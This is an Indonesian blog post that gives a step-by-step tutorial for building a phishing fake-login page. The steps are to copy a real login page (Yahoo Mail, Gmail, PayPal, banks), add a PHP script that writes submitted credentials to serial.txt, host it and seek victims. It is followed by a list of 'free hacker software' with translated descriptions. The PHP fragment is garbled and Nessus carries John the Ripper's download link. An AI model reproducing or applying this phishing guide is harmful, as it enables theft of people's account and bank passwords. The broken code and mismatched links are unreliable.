Ha..ha, saya sepertinya sudah gila menerbitkan artikel-artikel yang seharusnya tidak layak dipublikasikan. Tapi tidak mengapalah, saya hanya menyalurkan ide yang tidak bisa selamanya saya simpan dalam kepala penuh dosa ini. Ha3x… Teknik pencurian password menggunakan fake login atau lebih dikenal dengan nama phising telah saya bahas sebelumnya disini. Begitu juga dengan halaman fakelogin untuk facebook juga dapat dilihat disini. Nah bagi yang mau bereksperimen sendiri dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba disini ha3x….

Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html

Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode http://nama-domain.com diganti dengan nama domain tempat penyimpanan file fake login tersebut.

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama

Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:

Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x… Selamat Mencoba.

Software Hacker Gratis Free

1. Nmap
Saya rasa semua orang telah mendengar yang satu ini, baru berkembang menjadi seri 4.x.
Nmap (“Network Mapper”) adalah utilitas open source gratis untuk eksplorasi jaringan atau keamanan audit. Ia dirancang untuk secara cepat memindai jaringan yang besar, meskipun bekerja dengan baik terhadap host tunggal. Nmap menggunakan paket IP baku dengan cara baru untuk menentukan apa yang host yang tersedia pada jaringan, layanan apa saja (nama dan versi aplikasi) yang host tawarkan, apa sistem operasi (dan versi OS) mereka menjalankan, apa jenis paket filter / firewall sedang digunakan, dan puluhan karakteristik lainnya. Nmap berjalan pada hampir semua jenis komputer dan kedua konsol dan versi grafis yang tersedia. Nmap adalah bebas dan open source.

Link Download : https://nmap.org/download.html

2. Nessus Remote Security Scanner
Baru-baru ini pergi sumber tertutup, tapi masih dasarnya bebas. Bekerja dengan kerangka kerja client-server.
Nessus adalah kerentanan paling populer di dunia pemindai yang digunakan di lebih dari 75.000 organisasi di seluruh dunia. Banyak organisasi terbesar di dunia menyadari penghematan biaya signifikan dengan menggunakan Nessus untuk melakukan audit perusahaan perangkat bisnis penting dan aplikasi.

Link Download : http://www.openwall.com/john/

3. John Ripper yang
Ya, JTR 1,7 baru-baru ini dirilis!
John the Ripper merupakan password cracker yang cepat, saat ini tersedia untuk banyak rasa Unix (11 secara resmi didukung, tidak termasuk arsitektur yang berbeda), DOS, Win32, BeOS, dan OpenVMS. Tujuan utamanya adalah untuk mendeteksi password Unix lemah. Selain beberapa crypt (3) jenis password hash yang paling umum ditemukan di berbagai rasa Unix, didukung di luar kotak adalah Kerberos AFS dan Windows LM hash NT/2000/XP/2003, ditambah dengan beberapa lebih banyak dengan patch kontribusi.

Link Download : http://www.openwall.com/john/

4. Nikto
Nikto adalah Open Source (GPL) web server scanner yang melakukan tes komprehensif terhadap server web untuk beberapa item, termasuk lebih dari 3.200 file berbahaya / CGIS, versi di atas 625 server, dan masalah versi tertentu pada lebih dari 230 server. item Scan dan plugin sering diperbarui dan dapat diupdate secara otomatis (jika diinginkan).
Nikto adalah scanner CGI yang baik, ada beberapa alat lain yang cocok dengan Nikto (fokus pada fingerprinting http atau hacking Google / info gathering dll, artikel lain hanya untuk mereka).

Link Download : https://cirt.net/code/nikto.shtml

5. p0f
P0f v2 adalah alat pasif serbaguna OS fingerprinting. P0f dapat mengidentifikasi sistem operasi pada:
– Mesin yang terhubung ke komputer anda (SYN mode), – Mesin Anda terhubung ke (modus ACK SYN), – Mesin Anda tidak dapat terhubung ke (modus RST), – Mesin yang komunikasi Anda dapat mengamati.
Pada dasarnya bisa apa-apa sidik jari, hanya dengan mendengarkan, hal itu tidak membuat sambungan APAPUN aktif ke mesin target.

Link Download : http://lcamtuf.coredump.cx/p0f3/#/p0f.shtml